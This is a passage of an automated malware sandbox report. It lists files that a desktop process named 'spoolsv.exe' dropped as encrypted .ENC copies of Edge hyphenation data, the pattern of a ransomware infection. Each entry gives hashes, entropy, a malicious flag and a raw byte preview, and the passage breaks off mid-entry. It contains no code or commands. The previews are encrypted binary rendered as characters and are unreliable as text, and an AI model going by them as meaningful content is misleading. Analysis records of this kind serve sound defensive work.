                                                                                                                                                                                                                                                      MD5:5617639889C49F753096F3BEBEF66FF8
                                                                                                                                                                                                                                                      SHA1:AEB2BCBBEBCEBC56590633CD939DD23BA8FDDAF1
                                                                                                                                                                                                                                                      SHA-256:6EF967A6F0B34D769B42E1310BD06F6FAB1F1B58711C3265F05F4A76828EAC26
                                                                                                                                                                                                                                                      SHA-512:BAACF213D9456B5EE8639A5F79A90F297C295A54895DF54EAF17C9BE1444CE0B78208270BB191C7BDF6ED7D06401D2C9077E3C4AAE42D0ACD6195BCE86EC0289
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.G|;{..".+........N.. ..{i6a.w.."uf.uM_Kk.c..W.M.h.txh....,.uj..V..E....M...#..v4h...."..Rd...7..lv..}.a.=.+(5..vM...g...Qc..$.OfPE..?...m.F.f.f....\.......`C=.!. Zss.^?...5.E0m.:.,k.... .E#{......y.r.cd<7._........N..kT...S.6....].p.j/.."..A.....L.IZRr...S)`..KE5.b.x....7...{.H:F.#;Q...S....`...jS....,1.o14".....<.*Nu.f5.q\.ok.).A.O=..*.o......Z.....M..)IN%..h.4.n4..O.a.......K...7..{0~....fv.(..Ko...)....mWm...+.3....y.~.t?..k.V@o9....C^*.U.u....^.b..%.. .k......I8..J.l.....%.9....n......bK6.....Y........%1.xss.i%.b%..-..d1..X.......0...%.4.n...%...}.a....q..............Q.-*....R*F.g.Z..,?...Z.|..B.L..6}...f..\..s....K.Z..RD..5.iM....:Yk...CF.W...z.6d.....xnkU...}..D..`.2.'..r.Y...Ot.G?..8}H_&.Q.............3.R.f..T....=H.Y.&C `^Z.az..~....D'..q.....%..A('^'.y...DU$(.v..!@...Z:.CF*.?.*...{cR......Y...;....6,.!..K.aGGj..[...}..7....E..-]l.Y...S(#.n_...q+...g...G2Gz.Md.h...J....B...Z.+@...Y..k.t./I..t..$C.........?.~. Pp..()W%.gP.~.|.s.<..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-1996.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120416
                                                                                                                                                                                                                                                      Entropy (8bit):7.998340273133425
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:3072:0BzQ/FOnjx/A5ntztrq8itRYvpyfwsvqd5Hx:czQ/onjxwA0eqjx
                                                                                                                                                                                                                                                      MD5:622C456C6A7183AECB93F138C4F0D610
                                                                                                                                                                                                                                                      SHA1:159480BE32DC0B0635856F2F7A5C859B58E5397B
                                                                                                                                                                                                                                                      SHA-256:6EAE62ED24AFF74FDC7CE4B800F5309457E292A0B66EAABC7CC110FE5E5C36A2
                                                                                                                                                                                                                                                      SHA-512:61F85E5A67F666376F6CCD52A0FECB4B00CDF25DD6D20472F119A4763AEFAFB465A519B88038F2C9EC9257D81BE054831B54A636F396C47F3DF6B3A4BD4B11E4
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.G|;{..".+.....;..8L../GD.....&~Y....b.Xxy.e..{..4.E.l...DD.."U.{(h....Tj......Z..K..C^.wi)kR.-.B..o.R.4GM..J9Q..V..L...;..T..o'.4W...|^w.]g.[.t...I0.5.t.h:.k.@.z.ip...i.{..c.@....:.^._Ph....2....o..w.R.L..@.8....bu.mM..j{c...[R..K[AD..J\..QA......8.T;~V..y.H..7=..H..]...{.,R......z.S..y..|.Y.\._.H.;`E.....Z..b@..4......]S....ic...7.Zc....2.4.k.u./....].Cn.&.c!...)T$..]..w.]...~..%:.64.._dPwL.GU.mUWF#W%!.~...Uc'...7....j.E..".w..w._q...ghI4.7..M.o.....7r.-..P..;.^....k1.5..i.M.B.i...2.!.h.v..@.Y....__,..spLE.7I..K..'...T.J.h..7...NR.N5.7..=|..ql.d...$....S.Zi...cS.....R%..Ey.e.....u..Wa.c.q...m.]i'...@..9..4..KF.?.q0.zV..........G.".7B..69u.0y.m..[)...p....n...!*.XJqOz.c.<.w.t*..1.."&?,.l.V..F..I...D.*7k.d3fa....:'."...w<..D.d.=....]H[.h.........-!.~*..Y.R ....>.j^"U0.8....$?...0......;C.O..|Q.....*...#.i...v.D..R..@.|./C{.....D..u......L.....;..H.0[...s..5..9R}.C..F..i......|....%...iD.....+..`.n.9.X...I.J...i'C..7.3...0..0..X......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-de-ch-1901.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):120224
                                                                                                                                                                                                                                                      Entropy (8bit):7.9983246518975495
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:v/oZJ1WAfkdNoJNlOLoIY8VN56s6Ql2J8jLxXOQelRN8Jg1LIDrQh/nxcdSDl2E0:3A17sdNQY4s6Qpnelwg1LqQhGsUgHQ
                                                                                                                                                                                                                                                      MD5:E22DE4A344E399EF9D727CFA69C44924
                                                                                                                                                                                                                                                      SHA1:3BB5C5B358000276DC72A553BD16593AB7309931
                                                                                                                                                                                                                                                      SHA-256:16044EB55A46B142A2C1C8FEFB91D433F5C5FD17A2DBD78F93E4A712810D19FD
                                                                                                                                                                                                                                                      SHA-512:028CF52128114B975E333A159927A971562001B148F2C54F83105F0D2B8473EBF995C8752729CC2C51A55030F69EA9FA2690E939CC2FB4C81D557201173BA7F8
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.G|;{..".+....$..~( wY{vhu.KGV".&C..P...vKe?#..{.:..Ik.l..r.=..`.T.L>6I..;.~..\..S:.......gk...7.....S..F..y...V..nd...@."...V.8.L.p5..6.e}.....$........2.-..cw.B.x%...=nqBc..m~...?p..>... .....&p..l@.R.ZJA.*c8.'..,....&.U..}.2.o..YQ'Dj%..^yjE....!..P.u'#..~..D....4{.5O.).r?..:.L....~..+>..2.J...._l....x.di8X\......kM..4P."aRD..i!TP...Fu.L....$.a9S....J...!g..6D.s}Ak.=A.E...aB.*%I......&b...#..M....w.!L..(.L...;...ds..#.....u..&H-...F........UQ*]......1..A.,geG..H..............o..>_.f.R....F#{gr.DX..`Y..x ..).f..).H....8.o.!.)...P.).n...N..7.......pf.\b.f .C..#......w~i!M......]..f..&...8........iI.f.A..M.q.......-.....t.sy....t..i.U...0.....pJ...Y..c. .........%Q...voS_...o+.nQ...8.....Apc.!Y.ez......*.iay.F.. ...%...y.r-V 4.e./>.UDlzP...3....R&.v}>.B....BV.%.U.*..VL...UEB]..U..wA........<..u bS..:^..0e...j...j..d7..$...c..A.....X..i...-.....p"]Y...m......P.....o'.oB.V...........v"...1.,7.y.\.w.F..._3.....Z.S.sk.G...*V....a.s.5...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-gb.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):46608
                                                                                                                                                                                                                                                      Entropy (8bit):7.995903701438012
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:f16PYBYUu6toDQrLGbvSgavPk3iJonTPafKqgDRagv6RknRpSPDyzKaThG8:f0wGeoDIGvS3MTMkD4gvskR0P6KOhG8
                                                                                                                                                                                                                                                      MD5:ACB57690FAB8250BC368DAA78CEFFB86
                                                                                                                                                                                                                                                      SHA1:3B4DB31E70D5B15B93867CF33637E9A0E9667864
                                                                                                                                                                                                                                                      SHA-256:9ECAAB10B60C6A00A577F3B9B38501B560C948A511C0B7C19B78270663178CCB
                                                                                                                                                                                                                                                      SHA-512:49F5A3F101F56633F24191E4DEA92F7A0DD232E07A06C96D01642C077E868774BF3DE48ECD3D664E11A6D40455F4AA0762B382E896DA30A2244A05492D27FCD6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..T....72....)..R@.... $.K..ts.E$......|.P..E1v..v.{?d..Rl.a...]<......[ha...\.Z)<....I ...:j.=N7.+...k....R....g....@.....1..|..;..y)...D6!.V.BZ..6..f..#.q..+,....0.{..O.)`?.i..+p%M......}.j........s.....f,F.PN...,.;a^D....)....gy.....8..g........xy..s<...........^......Zg...Q.....3.gZ[.a!.^.S.`....!.c.gG.d,.0..=.Ag.{.u.Y.>".uy......y}e..[.[.........D.rt-.[.{.... +.%..!F.`A.R..V.:.l.../6.D...H<D..a.jV..e.{<A.......Y......\.H.........q..p:.7.?j....G)&Y.VIy#@%..a.t..K.t.".t.XX.d.`.....aR%.;z..]F^.4.o#.6_.C....{..M*..u.i..a...f.(..>..F...T#. .;..}...p.1kEv.Y,nJ..-m......?D.z.(....,/\>.n..:.N..Qa...r.._5.3D.K.:t......c.#.....w...| 1............>....... ..".wd..kdA.0........{".K.v[.>....y.j.J:.p..~._.-....5".E....S.}k+2JY.f.......2'_...jN8Z.PK.".W[.....S..S.f..`.S..Y...+VW...........w...u.Yit.......g4....r....<.;.+mC.....k.......K.....N9.r.0...+D..!..g!.[ .z`..~.O).)..d...AV.ny....G.pA...%}T..q.+.I0..ea.H^V...G.N... ....}...c.._

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-en-us.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):59808
                                                                                                                                                                                                                                                      Entropy (8bit):7.997145935677558
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:Sj4J2Edpmp7YfUO3biAM8Led7NNqSyhMCu:1pmpw3LeV+Xu
                                                                                                                                                                                                                                                      MD5:99ADDC93681B78CAB99CD5288C519763
                                                                                                                                                                                                                                                      SHA1:FB23C82E72A5FD0BDA583BFFD3C49F855A978FC0
                                                                                                                                                                                                                                                      SHA-256:340A99DFA7BD253A3FB13B34E1EA5E49842110014FCB27F335EACBF9EDF6FB11
                                                                                                                                                                                                                                                      SHA-512:D95A66A05478BA69BED195059C0B9D63DC1FB4F7688A4769F6422F06AB51E0B098F97574000843D59E576A229B4E56DD2A5720AE5C07497A76600793F59E821F
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..T....72....).o.).......]..A.j.....Y.g... o.|(8q.>.7..b.....AA4....^.u.....L;.o. ...`.#Y-..K.....q}.8|....i..*Q.w*p..f.].X;..n.!.....y...+..a..:..O..3.$.q....B7...P..../I.[.@X.M....y.$....r.g4...L.zg...R>.........R.%.GE..+ ...c].Q.8.G..... ..G.t...D.p.".<..H\..Dv....!._.._2.....A..Z.".e.F^..u.(et...O...D....;.XQ64.5..`.G.-1...u.....$~:.4>FK0......G....2.p(R.XD.j.:.{<.].s.v....tI.5r|:.pj%...P9..:.B....n..{.,stT.j...F2..zpY .......p..F.......1'{.0.Rg'l.w<....E..(X./.;.tk..H..S1`....m.A._...W.1$...a[.......Us....a...V\..+..~.Q...<D.. ..3K..Rp..7j..\.$..W..z+xpr...O.Y.............G5s.c......e._....<.';=a)Xp.p.7X]^?B.C......X....2........a.....7..2.L)T<.....P.1..K....VMe..<'?J.~.......b)N....7+.[...E...#....Nbb..#....e...5R..z..x......,w]ST....z.WZ@G.kR.-...-...86Ip".%..,.....4.8O.......`..s...i.;....~..L....=...&.q]...%..).PL..!.Y.!m4..44..d..>....n...a{.Y<......f.l..$.u..J...V.[0....N.H.s.)~@uA..........:...\...5.....I'..]~...d.....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-es.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15008
                                                                                                                                                                                                                                                      Entropy (8bit):7.986000888448938
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:x0MW+gV57fuR1QR6dPhcnrBIpTVDLAm0hLVAfbiX6:xnWjuR17hcStVcm0hL2mq
                                                                                                                                                                                                                                                      MD5:9B3A3F32E43376945C4A1BCA82807299
                                                                                                                                                                                                                                                      SHA1:10EE4028AEDBD34384793878A66F7D02523C2923
                                                                                                                                                                                                                                                      SHA-256:A191E41D5336D29AD9DE5A2B2A1782F1C7A532D1716C0F2AD81547A747E2D906
                                                                                                                                                                                                                                                      SHA-512:420AF263C66D67D715E667EAC9E089FC29098930CCE539205AC85FD48E868287FD087AEE2CB68577E0365D63D252C98C427D691AA1919BC5C22772AB9A92F241
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..I.p....0...}#"_.@%.....*.Z.!k...Q7.b..g...&r....Z&\..5..i..c.p......S.....tl.w.P......liNDH.6f.....z..(.Y#.k.b.}.S...|....,.{...#.LE..[....=3.R..GA.......AT$..R.8_...C.Qs.K.@.......8.E.OzG..B_...].7..;n..R.F...Eq.....;...._.b.4B..z..c..L=G[....*..]WA=+.ct...(...'....dY.x...o.+..e..6..-.I..a..:.J.O...1./.. SC.]....*..B.V.B..=RH..W..@p..'z...`.`m@.|G.K..{...7.R(.....EIM.(....=..}q...P$1.....7W.e.&..,.-Q.)5.t0...s..r..&..`k..P.OMKj$..-=.....pr.d..{...^.{...tC].r...)...}....PZ7.. .%..C.e.U..7.l;..w"..W.>....ae.7...q..wo8j...K(u.....I.....-..4....e.QeG....E;.@}b.)..R.nkIH[...@].;...Z.'..$..N\.........I........=..Y!..z^.\.....O.F..M>L.K.../....y;....E.H."...pzZO. bG._t..9.[.A.b..L.v......?.....T|..FV9...05..a!....j..G.fsf.B..e'J..[Y.^.R......pBP.z/.CO..-....:..31K./Y.[?*-F.#q...p..4A..EJ(LiT.U%..O`.......1Q..q+L.w.....;.da.d.2L.`....N...9...4].....X..+...NM.A..o... &.r[.....<........=..^.u.(u.;i.55.~..C...}.p..L.!.#.....R.#2..J,..........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-et.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21424
                                                                                                                                                                                                                                                      Entropy (8bit):7.99148845004945
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:jqp48ECnAh0Yqwxej97qn+u+ehe0+j+S0t0tWBy502jHcKyeJu9miZ9TI42Q/e2C:jh6AWYEZ7q+u+eheHj+x0Niw1ysHc909
                                                                                                                                                                                                                                                      MD5:E7EC32B5C68D9FEABDF4984750589E83
                                                                                                                                                                                                                                                      SHA1:B4366EB66FC3D6CAD2EED554B86DC349AD1D9F07
                                                                                                                                                                                                                                                      SHA-256:8EAC836CCD2C3122A797B387B4C74D6FF60BD076D7AF7DD0A62EEE1F68F28AF3
                                                                                                                                                                                                                                                      SHA-512:0ACCBC4EF579EA3E83F31167E40CC0550DB06A8A57EC7143B526161029A07BC204049188147CAE02EE06D4CF7DEA546F6768E5D3E49B10D1DB171C8214FACB2A
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:D..}..6..q......"..6v...}......P.O5...Y=....X.b....+....>.h.F.G.V.+.....d....*..L../.........|.ld..S....u5*..L..2..#.N.......t].......a...2...R>..y.}..+...7sL..A.x...vV .!...=...v*K.E.4..{.....y@I..G.dn8H..>.RA&1..|...X....%..s|ib......aL...)..z..>.....|..1...'.x..J..{8.,..|v...1..@...`._.x..w.D..).5.......#..1^....{.K@a5...S..."..q..}6n..1..lD.......F..QoI;.2...S....<.O.#.t.J..r...9Y....k....T.m..8-.....F.8..'.0..4.u..8.....^or=.>.O......6....G.*........q.e@...|Y.....Hxq.c...s...>.}LxP.K..J`W.Kg...V.zg..P.Z.[[....y....'......N.}).Z.).=.Y....m.{.!Qa.W.C.A..z..g....../C.`........ m...ghf...R.._.v..(J.g..<D.-.|..].P...l.b..S....M..0.`...".^ZK..e.C5..........Y....2.A.5.o.p..%mZ,...R...o....~......" .UuC...x.......$......3.o].9.U..*P.$...^R1.N..].....6(.].[T^.4......d.....5=.....u...=....WknT.0bR........{k W.QP....W\.N.....B..%Q..M(.........]</..a.X.I..Y...M..)....#bN.....`#..g....,....r,....{voV..&.j.n......7.#.....o..n..l.o~;.;.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-eu.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):672
                                                                                                                                                                                                                                                      Entropy (8bit):7.653782111155747
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:jzuBFO/HpP5cpUf4KEIa6MyzxBDe7GJvuJGaXeB7+7U+s30AOehUeEZjOM:jeOPp5yIa6McxBDeev4XeseEFyU3Z
                                                                                                                                                                                                                                                      MD5:12D37CF5BA0AF37F995EFF08B02795F8
                                                                                                                                                                                                                                                      SHA1:F916C7D6A6AD56C52C98B5C87303F7B43825BCF0
                                                                                                                                                                                                                                                      SHA-256:D126315C55122DEB2CE5D217D6B7855E7D59EECF9549F07A3A77AF8129E1FCFD
                                                                                                                                                                                                                                                      SHA-512:3AF321A93B0C339FD9DAC3E9F3FD5382C716145D969155C4B686B4FFE77CCA000A4FC917E219077EB5C920141413460EEFB0D62224E6BD101431028F296DCCD8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..F....W.r..Y...Kf..P}m..j..O.r...Ih....,&U.r6"..g."...4...;s..6..{fg./.?.G.~q..z..p.PZ..k;.L.K......#...}_....-lz.....U.A-.bR/.6......u."...u.'.y..RG.."....VGj.do9_pk1n/.w..C..W...i.+g..h[.O._`J.....V}...EW}(...H...d..+..9./.a..._L.7i?.0=%.5.=?]..N...)..tn).j.1.d.d5a.p....>..L.`r$..Y~......"n...A<.!..h.u.V...a..;....K>.h.S^..^.RK.?....m...S..*.d..a.........o.4...k.....q.S.I.]..7.0....N..'l,...-.hh.p............?`.)w)G.. .`.r..<Lh1.&....@)N...m.....(...Y....v..|T..6......5....(.N.vd.^...1......:.`....V..M..p.."OWT.0:.#.w"..d..x..?.}....G6....(...?x..9s..%..Y....S.&z...........(O..'(.S!zi../.ze...$.G...&..-....6..Z.!.......t@..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-fr.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8176
                                                                                                                                                                                                                                                      Entropy (8bit):7.972400587796836
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:zmYl3JNVCTXv0m8YKsILf/yhCsCJB2yGZb2CV25DFD:yYFJfqXcmN6iCZrwF25F
                                                                                                                                                                                                                                                      MD5:41BDEF1A3CA095A37266BC20AA969CFF
                                                                                                                                                                                                                                                      SHA1:DA412CE68F55EA57EFBCD7B71790F73CCB8F16CE
                                                                                                                                                                                                                                                      SHA-256:57D6A9B9BC5D7EF52D0C50720AB13B471C3D469E1D604E451801DDA007E17FB1
                                                                                                                                                                                                                                                      SHA-512:A4F01FCDB06981B56EA08D1DECA3401F441B8564EE00BD48EF373606CDD4685CD1327E6977B465E74BC21634DE164822CEB9432ABCF486652DDAC401BF786924
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...........A-./.F*fsFM...n....R..\.x...\b.{..x...`x?q.|....G....P*.!Ki.\S".h.......T.'q{!_Zb.M...;d7..c47/..0...cBC.G.&.....^MP5.T.....J].p..y$...m.....ZQ.~....G.#.qD.].=...].R....zr..eb=..?#.%./1lFq.J.?{......M......PX|7W..@).x......aL...OV..Bz:.'h&....^3:d..g...|. ...\U.n:[.......z..:.3...@.r....Fr.?7G?...a;....~...z...v.{t.u.1L.....<6.dT.h.....2E.A..$..!.z..Sa.`.R....Q.~.*.......FT..jH....ljQ.<...U.S.X.mzP.N..oL..v4......;...N..^..}%..F.Y.........az..d..[9E..mo.......A...s.x.n_.6....9......@.[Jl.8._F.b.Vq..K.....J..p.o.w:.......y....`?`u.>.M..X>Y#>....W!...T.7.cW..k.)...'.V+...^.h..e.0.........P.Y`6..}.S!m&.n4.-QQ$.z.........?..5M....j..f......M...Z'gvQuuVn..@..)....Q.T.]hK.(PTd.lB....!q.v\).b..F.I...L;.r...GJ..D-~99*..m....e....<.jF}l.h..........N...b.............~5..?%!.`.^wjj....D....c....M .....;, I...@...8:=k..}...@q.H....U.Y....~c....5.2....O....nU..._.mf.87..\D.../.....5b...~>.:,..?....$.8..G8...'.t.......9v[.....)C.....U.P.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ga.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):35840
                                                                                                                                                                                                                                                      Entropy (8bit):7.994340334369712
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:g3kjC5PcXSAvWS0FIbjbpSJCeiV+E2rimMIusTJNrw957Zao84:g3ku5kCAvAg1SJCzcE4imnusDM957Zac
                                                                                                                                                                                                                                                      MD5:A97CAD31C91A590455BD8593FA893282
                                                                                                                                                                                                                                                      SHA1:E378BAB348959CCF7B959E37AC7315C8B9D8BD0E
                                                                                                                                                                                                                                                      SHA-256:391D5277BA706947E558E292BF2C812BF7EAF6BF476790E83777F89AADFC10B4
                                                                                                                                                                                                                                                      SHA-512:668328316C425CE60BCD3A70FBE9D4466D703DA5C25E1E7FEEC1C0237C810EB1054D715239BD01CD90B94D05D5EAA194654E00FA4409D497C6F870C73C1E7734
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..I.p....0...}Xq.X.j......... ...FM...e......z.H.G....&....'.....DV.el....VA..~..A..?.*mb....%....2..[.q.d......Q.........i....Ukz...PX..1|.Z.f..j.J....`iS9."...>..."..\....Fy.......:.<.[e....'....W..2v.....N............ .L.).\o.9Q6t@......\.T...T.!...qaJ.....CY.F...:.(wA.GW...^..L.....C......'..W.a...c8..|...s.\.....&e..Z>.....D.I..E....R....u.R..O.m.:!*..H[..-.F...i.....Q......0....?A".w..f;sf.]'-..@...z.b....&^m.9.R.\.g.....lO.....h.'0D.!.......A..a...*N...;.'..$`kC...Ky$.|{....W/...... ...a...:2...:<.p....\.b.1..L\..s"Z..2$.1.4..../.%.Q.............+..I.M.....-........;.g.....3.>&h|......Z....j,&z..GTM...|...$..W..Z.Z.............CS........tS{.^;.".`....cE."K..C6/.M<0. ..0KE.&~L,..r.r.='...R...l9"D..L...."xD.n.........(..7s.b@.2.F..Q..wE..0..g.............ua..>.-.a.mj...S.%..d.D.."....v......:&$....@$..O..j7..W..*.\....V.^.....Q{P...p.s.}WQ3;s&.QR-J..+'.........;5E...~{.Y.T#6.a.6..T.S....@...D(....j.w...s...!.rwty.|X

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-gu.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):656
                                                                                                                                                                                                                                                      Entropy (8bit):7.681456271014984
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:oe6FzCRZzXKjgtovF+N2SmbVVdGDk94rJgIiavfAfSNLeJ4N+Lgdilnw:OFazX0gt72/VVkYmKIjfTeJ4ULgdP
                                                                                                                                                                                                                                                      MD5:00920F18C64FF29FF8730C391C21F54F
                                                                                                                                                                                                                                                      SHA1:6A5367018A4E707F11A44D843CB90C2ED31C1FB2
                                                                                                                                                                                                                                                      SHA-256:65648C6F6052FAE425F795CA8FAB8527623A902B0DC0CEC1EA9567AAB96C64BF
                                                                                                                                                                                                                                                      SHA-512:F22A6D720112C398A9A91FC21D9D8637D226920BD431A2CE2340C4C39A45A55CC52819220DCAEE9437973C8A475A06E8F607983DCAA3C34A6734AC374D713268
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.....s..@"...O..._r.E...x....>..e%.@8.09{!.....A.v......2A. .....~h.E]....ZE.]-.....R.o.T.?....J_.a....?\p>7Nn.E]j0L'.....bZ.}.'9....v...|.#...Uu...i.}O..~..L$....X....B.a.l.#.E.~]&.D....s.Sx..ow..g"uQ.g..6#..Y,.hl..."o.D8.B..Y..N@P......Q...g..bx.Tm..i........%.?.x./..Z.NE..6!..(...q..}..15.j...n8U......!6..et....5....B>.=O...d..A.\...dU8i..Q+...H.p.w..p.[ ....L.o..t{.l.j+.y.I....7z..q..X.f..!...O.j...o...k{...R...7~I>_yZ..*3....^..-k.v.q..q9p.uJV.w,..O!........Q........)#..+......^..E'....`a...]X...4.U...Q..1.6zh..H?....m`......P....~.,.O.o.Mi,.}...&.6i+#u.T......"....._jja..e...d.pR.......{..~.AR.V.........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hi.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):688
                                                                                                                                                                                                                                                      Entropy (8bit):7.680265330442788
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:vUGM3bGwfKpyvQrId80fg/12AgZA3K+nsrQP7+Ejpa7QmKGuBhD+uMkQCy5p8zEK:IGiKp0Qrm80f82AgHqsrQzhjpa7Qm0DV
                                                                                                                                                                                                                                                      MD5:248D88240EBB54463D81EE6667B906A7
                                                                                                                                                                                                                                                      SHA1:3A6ACFA7DA8DA091FA569329F763BCA62B00441E
                                                                                                                                                                                                                                                      SHA-256:A30BC49D0FD721B6C59F8267AA4F5581A3E68BA6292C905836F62F23C96C2C60
                                                                                                                                                                                                                                                      SHA-512:4C6A9031E376DBE039E972A4E6A3B82577143892A4381FD2BF43816BA50B8A2C9FB913FEE43B8CD2FE90E6D85350033985C76F19BC0CC1D04C963DF5F1FAC6AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:...M.....>$..j..j_.&.3.J.Z-t......KY.....[y.=.h5..wUs.n~...7.Di.<nn...pC..=z..Py7....;...i...4p..#......n.;.@......s(9...J.IY...........}.J.#..<.....>....O......b....I'&9+[.C........M.....K...{\".e3.Ud.=..?...=..K..64....s.......|\M....`Ylf..:...b!.w`..RRe....RWwY..A..........q#h.Y..58....Gf.&...uq.....O4.L..m*...v..D.6..N...&.@y..h...4.%...~..:}n.`....>q4.I..^.a....E...s)...PR.h.?Nw\......>..:.E.@...[.t&.|..?/....].i..L......t.m.b.5...T.[..%...%..... ...i..&..Q...R*.^.........Q).Z.0....\..B.9_.W..,....T....X8...hnc.eex.j.o.#....?........9[#.DU....[..._.r.61e...s...n.Nx..5#........)@)...........9$...}\...D.h... ]@YS.-.....J...s...?.H.....!...V8..I7x.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-hr.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3040
                                                                                                                                                                                                                                                      Entropy (8bit):7.9426357356750215
                                                                                                                                                                                                                                                      Encrypted:false
